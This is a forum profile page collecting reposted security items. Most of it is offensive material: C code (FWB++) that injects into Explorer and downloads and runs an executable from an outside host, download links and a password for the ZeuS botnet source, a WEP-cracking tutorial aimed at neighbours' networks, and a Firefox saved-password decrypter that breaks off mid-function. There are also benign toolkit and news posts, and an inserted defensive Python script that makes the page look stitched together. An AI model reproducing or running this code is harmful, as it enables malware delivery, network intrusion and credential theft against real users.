Everything posted by Nytro
-
Introduction to Network Security Toolkit (NST)

The Network Security Toolkit (NST) is an ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.

The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article "Top 100 Security Tools" by INSECURE.ORG are available in the toolkit. Some of the tools available in this live CD are: Ntop, Wireshark, Nmap with the visualization tool Zenmap, and Kismet.

Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are Nmap with the visualization tool Zenmap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management.

You can read some of my articles about Nmap and Ntop by following the links; for Nmap you also get Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

Nagios and Argus are also available on NST, two programs that can be used for network monitoring: you can check the status of various services, like a web server, a POP/IMAP mail server or other services that in general you can test directly with a network connection.

Another nice, and really “scenic”, feature is that NST includes visualization of ntop, Wireshark, traceroute and Kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST uses a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery.

There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages.

A great guide to what is available on the live distro and how to use each tool is present on the official wiki.

Conclusions

This live CD is really filled with security tools and utilities, so it could be really useful for setting up, in a few minutes, a location where you can do a security audit of a network or some hosts. The option to put it on a virtual machine is also really interesting; on the wiki there is a good how-to on putting NST on VirtualBox. So in a few words: try it and use it for your security audit, you’ll be satisfied for sure.

Link: http://sourceforge.net/projects/nst/

Source (+video): Linuxaria, Introduction to Network Security Toolkit (NST)
-
Practical Android Attacks

Bas Alberts + Massimiliano Oldani, Immunity Inc.

Attack Surface
• Remote: gain access
    • Browser – WebKit
    • Phone – Telephony stack
• Local: elevate privileges
    • Kernel – Device drivers
    • Userland – Zygote, ADBd, udev, etc.

Download: https://www.immunityinc.com/infiltrate/presentations/Android_Attacks.odt.pdf
-
Local File Inclusion to Remote Command Execution using SSH

May 9th, 2011 at 21:15 by lanmaster53

Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs.

I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result.

I was shocked to find that auth.log was world readable. By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject PHP code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following:

One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times.

The injected command will run 3 times unless PHP execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics.
Source: Local File Inclusion to Remote Command Execution using SSH « LaNMaSteR53.blog

Simple and effective.
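A defender-side check for the condition this post describes, as an added example that is not part of the original post: it scans sshd entries in auth.log for user names carrying script markers or other unexpected characters, counts how many entries each attempt left, and tests whether a log's mode is world readable. The sample log lines, host name and addresses are constructed, and the three message formats are assumed to match the sshd version in use.

```python
import os
import re
import stat

# Constructed sample in the style of OpenSSH auth.log entries (not taken from
# the post). Addresses are from the documentation ranges.
SAMPLE_AUTH_LOG = """\
May  9 21:02:11 web01 sshd[4211]: Invalid user backup from 198.51.100.7
May  9 21:02:11 web01 sshd[4211]: input_userauth_request: invalid user backup
May  9 21:02:13 web01 sshd[4211]: Failed password for invalid user backup from 198.51.100.7 port 40112 ssh2
May  9 21:05:40 web01 sshd[4302]: Invalid user <?php exit; ?> from 203.0.113.9
May  9 21:05:40 web01 sshd[4302]: input_userauth_request: invalid user <?php exit; ?>
May  9 21:05:42 web01 sshd[4302]: Failed password for invalid user <?php exit; ?> from 203.0.113.9 port 51544 ssh2
May  9 21:07:02 web01 sshd[4310]: Accepted publickey for deploy from 192.0.2.20 port 50022 ssh2
"""

# Everything after "sshd[pid]: " is the message written by the daemon.
SSHD_MSG = re.compile(r"sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$")

# Assumed message formats that embed the client-supplied user name.
USER_PATTERNS = (
    re.compile(r"^Invalid user (?P<user>.*) from (?P<ip>\S+)(?: port \d+)?$"),
    re.compile(r"^input_userauth_request: invalid user (?P<user>.*?)(?: \[preauth\])?$"),
    re.compile(r"^Failed \S+ for (?:invalid user )?(?P<user>.*) from (?P<ip>\S+) port \d+ \S+$"),
)

# Conservative allow-list: anything outside it is reported for review.
PLAUSIBLE_USER = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.@-]{0,63}\$?$")
SCRIPT_MARKERS = ("<?", "<%", "<script")


def extract_user(msg):
    """Return (user, ip) if the sshd message embeds a user name, else None."""
    for pattern in USER_PATTERNS:
        m = pattern.match(msg)
        if m:
            return m.group("user"), m.groupdict().get("ip")
    return None


def find_suspicious_usernames(log_text):
    """Group implausible user names by sshd pid; one attempt yields several entries."""
    findings = {}
    for line in log_text.splitlines():
        m = SSHD_MSG.search(line)
        if not m:
            continue
        parsed = extract_user(m.group("msg"))
        if parsed is None:
            continue
        user, ip = parsed
        if PLAUSIBLE_USER.match(user):
            continue
        key = (m.group("pid"), user)
        entry = findings.setdefault(key, {
            "pid": int(m.group("pid")),
            "user": user,
            "ip": None,
            "entries": 0,
            "script_marker": any(s in user.lower() for s in SCRIPT_MARKERS),
        })
        entry["entries"] += 1
        entry["ip"] = entry["ip"] or ip
    return list(findings.values())


def mode_is_world_readable(mode):
    """True if the 'other' read bit is set in a st_mode value."""
    return bool(mode & stat.S_IROTH)


def log_is_world_readable(path):
    """True if any local account, including the web server's, can read the log."""
    return mode_is_world_readable(os.stat(path).st_mode)


if __name__ == "__main__":
    for f in find_suspicious_usernames(SAMPLE_AUTH_LOG):
        print("pid %(pid)d from %(ip)s: %(entries)d entries, user=%(user)r, "
              "script_marker=%(script_marker)s" % f)
    path = "/var/log/auth.log"  # assumed location; differs between distributions
    if os.path.exists(path):
        print(path, "world readable:", log_is_world_readable(path))
```

Where `log_is_world_readable` returns true, restricting the log to its owner and group removes the read access the post depended on.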
-
NoVirusThanks File Governor

Easily unlock locked files and folders.

File Governor is an advanced program which allows for files and folders within the system to be unlocked so that normal file I/O operations can be completed when normally they would not be able to be due to operating system restrictions for files currently in use. Once a file or folder is unlocked you will be able to force-close the file’s handle, rename, delete etc.

File Governor is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7.

Features
• Compatible with 32 & 64 bit OS
• Copy File to a User-Specified Directory
• Explorer Context Menu
• No Kernel Driver Needed
• Rename File to a User-Specified Filename
• Search for Locked Files
• Terminate Processes
• Unload DLL
• Unlock ALL Locked Files
• Unlock Single File
• Very user-friendly GUI

Download: http://downloads.novirusthanks.org/files/filegovernor_setup.exe
Portable: http://downloads.novirusthanks.org/files/portables/filegovernor_portable.zip

Source: NoVirusThanks File Governor - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
-
Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! Download: http://krash.in/real2/zeus.rar http://www.multiupload.com/P8QUNF4YJN Password: zeus Sursa: Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! ~ THN : The Hackers News Alternativ: http://www.megaupload.com/?d=LTJR7DHO https://rapidshare.com/files/461898687/ZeuS_2.0.8.9.zip http://uploading.com/files/626ff4fc/ZeuS%2B2.0.8.9.zip/
-
Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf
-
Two Zero Day Flaws Used To Bypass Google Chrome Security

May 10, 2011 | 02:02 PM
By Kelly Jackson Higgins, Dark Reading

French researchers say they hacked their way out of browser's sandbox, bypassed DES and ASLR

Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features.

VUPEN—which withheld technical details of the bugs in its disclosure--had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers.

"We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN.

A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said.

Chrome's sandbox feature, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack.

Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox."

The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar.

Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data.

VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine.

Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).

VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox."

Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen."

And the hack highlights just how the sandbox—albeit an extra layer of security—is still just another piece of software that has vulnerabilities of its own, experts say.

"Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says.

Invincea's Ghosh says he expects the vulnerabilities to be exploited -- initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says.

Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks.

Source: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html
-
I forgot to mention the source; I have updated the first post.
-
How To Crack WEP using Backtrack w/Pictures

Author: Warlock

This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it.

Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi.

What you need:
• Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around), which you can get here; Downloads
• A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)
• Patience

Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd.

First of all, before you do anything, navigate to the wireless assistant; Start>Internet>Wireless Assistant

If you do not see any networks, then this will not work for you.

Open the konsole, which is here;

Now type,

    airmon-ng

It should show you your wireless card's info, like so;

Now type

    airmon-ng stop (your interface)

Should show you this;

Now type

    ifconfig (your interface) down

Then type

    macchanger --mac 00:11:22:33:44:55 (your interface)

This spoofs your mac address, so your victim cannot figure out who you are.

Type

    airodump-ng (your interface)

This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (This will stop your wireless card from searching for new networks)

Open a new konsole. Type

    airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

Like so;

It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.) Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup.

Open another konsole and type

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface)

Type

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface)

Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C

Now type

    aircrack-ng -b (bssid) (filename-01.cap)

You have found the WEP key, mine being 77838557744334834238286364 (without the colons)

And you're done!

~Warlock

Source: LeetCoders
-
FWB++ FWB++ example by r3l4x[] (FWB stands for Firewall Bypass) /* Coder:Anskya,r3l4x[] */ #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200") #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO") #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text") #pragma comment(lib, "urlmon.lib") #include <windows.h> unsigned long inject (void *) { URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0); WinExec("C:\\xx.exe", SW_SHOW); ExitThread(0); return 0; } void Entrypoint() { DWORD Size; PBYTE module; HANDLE process; DWORD PID; LPVOID NewModule; module = (PBYTE)GetModuleHandle(0); Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage; GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID); process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); VirtualFreeEx(process, module, 0, MEM_RELEASE); NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(process, NewModule, module, Size, NULL) CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL); } Sursa: LeetCoders
-
Morphine Packer (C++ version)

Author: holyfather

This is a C/asm port of the original Delphi code.

Download: http://www.megaupload.com/?d=PU3FCSNN

Source: http://leetcoders.org/showthread.php?t=167
-
FF pass Decrypt Firefox Password Decrypter by KriPpLer //----------------------------------------------------------------------- //////////////////////////////////////////////////////////// // Description: Firefox Password Cache Decrypter // Versions: Firefox 1, 2, and 3 // Author: KriPpLer // Language: C // Released: 9/9/2008 // URL: http://www.krippler.com/ /////////////////////////////////////////////////////////// // Credit: http://securityxploded.com/ (FF 2 Source) // Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip //////////////////////////////////////////////////////////// //----------------------------------------------------------------------- #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <userenv.h> #pragma comment(lib,"userenv.lib") //----------------------------------------------------------------------- //Firefox internal SEC structures typedef enum SECItemType { siBuffer = 0, siClearDataBuffer = 1, siCipherDataBuffer = 2, siDERCertBuffer = 3, siEncodedCertBuffer = 4, siDERNameBuffer = 5, siEncodedNameBuffer = 6, siAsciiNameString = 7, siAsciiString = 8, siDEROID = 9, siUnsignedInteger = 10, siUTCTime = 11, siGeneralizedTime = 12 }; struct SECItem { SECItemType type; unsigned char *data; unsigned int len; }; typedef enum SECStatus { SECWouldBlock = -2, SECFailure = -1, SECSuccess = 0 }; //----------------------------------------------------------------------- //Removes gecko-sdk dependency #define PRBool int #define PRUint32 unsigned int #define PR_TRUE 1 #define PR_FALSE 0 //Mozilla library names #define NSS_LIBRARY_NAME "nss3.dll" #define PLC_LIBRARY_NAME "plc4.dll" #define NSPR_LIBRARY_NAME "nspr4.dll" #define SQLITE_LIBRARY_NAME "sqlite3.dll" #define MOZCRT_LIBRARY_NAME "mozcrt19.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define PLDS_LIBRARY_NAME "plds4.dll" #define SOFTN_LIBRARY_NAME "softokn3.dll" #define LOADLIBRARY(x) 
LoadLibrary(x) #define GETPROCADDRESS GetProcAddress #define FREELIBRARY FreeLibrary //----------------------------------------------------------------------- const int buflen = 10240; static char readbuf[buflen+1]; static int last = 0; static int next = 0; typedef struct PK11SlotInfoStr PK11SlotInfo; // NSS Library functions typedef SECStatus (*NSS_Init) (const char *configdir); typedef SECStatus (*NSS_Shutdown) (void); typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void); typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot); typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw); typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx); typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx); // PLC Library functions typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest); // Function declarations.. void NSSUnload(); int InitFFLibs(char *firefoxPath); int InitializeNSSLibrary(char *profilePath, char *password); int CheckMasterPassword(char *password); int DirectoryExists( char *path ); void StrLwr(char *str); int OpenFile(char *filePath); void CloseFile(); int ReadLine(char *buffer, int size); char *GetFFProfilePath(); char *GetFFLibPath(); char *GetFFVersion(); char **Explode(char *StrIn,const char *Delimiter); char *Split(char *String,char Delimeter[],int Part); char *replace(char *str, const char *substr, const char *repstr); char ReadChar(); char Vers[_MAX_PATH] = ""; int version = 1; int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen); int Base64Decode(char *cryptData, char **decodeData, int *decodeLen); //----------------------------------------------------------------------- NSS_Init NSSInit = NULL; NSS_Shutdown NSSShutdown = NULL; PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL; PK11_CheckUserPassword PK11CheckUserPassword = NULL; PK11_FreeSlot PK11FreeSlot = NULL; PK11_Authenticate PK11Authenticate = NULL; 
PK11SDR_Decrypt PK11SDRDecrypt = NULL; PL_Base64Decode PLBase64Decode = NULL; int IsNSSInitialized = 0; HMODULE libnss = NULL; HMODULE libplc = NULL; HMODULE libtmp = NULL; FILE *signonFile = NULL; //----------------------------------------------------------------------- int OpenFile(char *filePath) { last = next = 0; signonFile = fopen(filePath, "r"); if( signonFile == NULL ) { return 0; //fail } return 1; } //----------------------------------------------------------------------- char ReadChar() { if (next >= last) { next = 0; last = fread(readbuf, 1, buflen, signonFile); if (last <= 0 ) { return 0; } } return (readbuf[next++]); } //----------------------------------------------------------------------- int ReadLine(char *buffer, int size) { unsigned int c; int strLength = 0, i=0; buffer[0] = 0; while(1) { c = ReadChar(); // eof reached if ( c == 0 ) // || feof(file) ) return 0; if (c == '\n') { buffer[strLength++] = 0; break; } if (c != '\r') { for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++) { if( strLength >= size ) { printf("\n Buffer is insufficient to store data"); return 0; } // Increase buffer capacity dynamically buffer[strLength++] = (char)c; c = c >> 8; } } } return 1; } //----------------------------------------------------------------------- //Misc functions int DirectoryExists( char *path ) { DWORD attr = GetFileAttributes(path); if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) ) { return 0; } return 1; } //----------------------------------------------------------------------- void StrLwr(char *str) { int n=strlen(str); for(int i=0; i<n; i++) { if( str[i] >=65 && str[i]<=90 ) str[i]+=32; } } //----------------------------------------------------------------------- //Loads specified firefox library with the given ffdir path as root HMODULE LoadLibrary(char *firefoxDir, char *libName) { char loadPath[4096]=""; strcpy(loadPath, firefoxDir); strcat(loadPath, "/"); strcat(loadPath, libName); libtmp = LOADLIBRARY(loadPath); if( !libtmp ) { return 0; 
//Failed to load library } return libtmp; } //----------------------------------------------------------------------- int InitFFLibs(char *FFDir) { libnss = libplc = NULL; //Load all required dll's if( FFDir != NULL ) { //Minor version check if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower { goto version2; } else { if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) ) { } } } } } } version2: if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) ) { libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME); if(libnss ) printf("\n\n Librarys loaded from master firefox path successfully"); } } } } } } // Now load from current path. if( !libnss ) { libnss =LOADLIBRARY(NSS_LIBRARY_NAME); libplc =LOADLIBRARY(PLC_LIBRARY_NAME); if( !libnss || !libplc ) { printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME); return 0; } } else { printf("\n Firefox Libraries loaded successfully"); } // Extract the required functions.... 
NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init"); NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown"); PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot"); PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot"); PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate"); PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt"); PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword"); if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) { printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME); NSSUnload(); return 0; } // Get the functions from PLC library PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode"); if( !PLBase64Decode ) { printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME); NSSUnload(); return 0; } else { printf("\n Firefox library initialized successfully"); } return 1; } //----------------------------------------------------------------------- int InitializeNSSLibrary(char *profilePath) { IsNSSInitialized = 0; // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { printf("\n\n NSSLib Initialization failed"); NSSUnload(); return 0; } else { IsNSSInitialized = 1; printf("\n NSS library initiliazed successfully"); } return 1; } //----------------------------------------------------------------------- void NSSUnload() { if( IsNSSInitialized && (NSSShutdown != NULL) ) (*NSSShutdown)(); if( libnss != NULL ) FREELIBRARY(libnss); //Free nss library if( libplc != NULL ) FREELIBRARY(libplc); //Free plc library } //----------------------------------------------------------------------- int DecryptStr(char *cryptData, char **clearData) { int decodeLen = 0; int finalLen = 0; char *decodeData = NULL; char 
*finalData = NULL; if( cryptData[0] != NULL ) { if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) ) { return 0; } // Do the actual PK11 decryption if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) { return 0; } *clearData = (char*) malloc( finalLen + 1 ); if( *clearData == NULL ) { printf("\n Insufficient memory"); return 0; } memcpy(*clearData, finalData, finalLen); *(*clearData + finalLen) = 0; // Null terminate string return 1; } if( Base64Decode(cryptData, clearData, &decodeLen) == 0 ) { return 0; } return 1; } //----------------------------------------------------------------------- int Base64Decode(char *cryptData, char **decodeData, int *decodeLen) { int len = strlen( cryptData ); int adjust = 0; if (cryptData[len-1] == '=') { adjust++; if (cryptData[len-2] == '=') adjust++; } *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL); if( *decodeData == NULL ) { return 0; } *decodeLen = (len*3)/4 - adjust; return 1; } //----------------------------------------------------------------------- int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen) { PK11SlotInfo *slot = 0; SECStatus status; SECItem request; SECItem reply; // Find token with SDR key slot = (*PK11GetInternalKeySlot)(); if (!slot) { return 0; } // Decrypt the string request.data = (unsigned char *)decodeData; request.len = decodeLen; reply.data = 0; reply.len = 0; status = (*PK11SDRDecrypt)(&request, &reply, NULL); if (status != SECSuccess) { return 0; } *clearData = (char*)reply.data; *finalLen = reply.len; // Free the slot (*PK11FreeSlot)(slot); return 1; } //----------------------------------------------------------------------- int DumpCache(char *profilePath,char *signonFile) { char buffer[10240]; char sbuffer[10240]; char name[10240]; char *clearData = NULL; int bufferLength = 10240; int count = 0; int ret; if( profilePath == NULL || signonFile == NULL) { return 0; } 
    strcpy(sbuffer,profilePath);
    strcat(sbuffer,"\\");
    strcat(sbuffer,signonFile);

    if(OpenFile(sbuffer) == 0 ) // Open the signon file
    {
        printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile);
        return 0;
    }
    else
    {
        printf("\n\n ============================================================== ");
        printf("\n = %s = ",signonFile);
        printf("\n ============================================================== ");

        /*/////////////////////////////////////////
        Begin cache dump
        *//////////////////////////////////////////
        printf("\n\n ======================= Unmanaged URLS ======================= ");

        // Read out the unmanaged ("Never remember" URL list
        ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag

        while (ReadLine(buffer, bufferLength) != 0)
        {
            // End of unmanaged list
            if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
                break;
            printf("\n %s ", buffer);
        }

        printf("\n ======================== Managed URLS ========================\n");

        // read the URL line
        while (ReadLine(buffer, bufferLength) != 0 ){
            printf("\n URL: %s ", buffer);

            //Start looping through final singon*.txt file
            while (ReadLine(buffer, bufferLength) != 0 )
            {
                if (buffer[0] == '.')
                {
                    printf("\n ==============================================================\n");
                    break; // end of cache entry
                }

                //Check if its a password
                if (buffer[0] == '*')
                {
                    strcpy(name,&buffer[1]);
                    ret = ReadLine(buffer, bufferLength);
                }
                else
                {
                    printf("\n");
                    strcpy(name, buffer);
                    ret = ReadLine(buffer, bufferLength);
                }

                if( DecryptStr(buffer, &clearData) == 1 )
                {
                    printf("\n %s: %s ", name, clearData);
                    clearData = NULL;
                }
            }
        }

        printf("\n\n ============================================================== ");
        printf("\n = END %s = ",signonFile);
        printf("\n ============================================================== \n");
        return 1;
    }
    /*/////////////////////////////////////////
    End pcache dump
    *//////////////////////////////////////////
}

//-----------------------------------------------------------------------
// Find firefox path / libraries
char *GetFFLibPath()
{
    char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
    char path[_MAX_PATH] ="";
    char *FFDir = NULL;
    DWORD pathSize = _MAX_PATH;
    DWORD valueType;
    HKEY rkey;

    // Open firefox registry key
    if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
    {
        printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
        return NULL;
    }

    // Read the firefox path
    if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
    {
        printf("\n Failed to read the firefox path value from registry ");
        RegCloseKey(rkey);
        return NULL;
    }

    if( pathSize <= 0 || path[0] == 0)
    {
        printf("\n Unable to locate firefox installation path");
        RegCloseKey(rkey);
        return NULL;
    }

    RegCloseKey(rkey);

    // Remove extra quotes
    if( path[0] == '\"' )
    {
        for(int i=0; i < strlen(path)-1 ; i++)
            path[i] = path[i+1];
    }

    printf("\n Firefox main exe: %s", path);

    // Terminate the string at last "\\"
    for(int j=strlen(path)-1; j>0; j--)
    {
        if( path[j] == '\\' )
        {
            path[j]=0;
            break;
        }
    }

    FFDir = (char*) malloc( strlen(path) + 1);

    if(FFDir)
        strcpy(FFDir, path);

    printf("\n Firefox path: %s", FFDir);

    return FFDir;
}

//-----------------------------------------------------------------------
char *GetFFProfilePath()
{
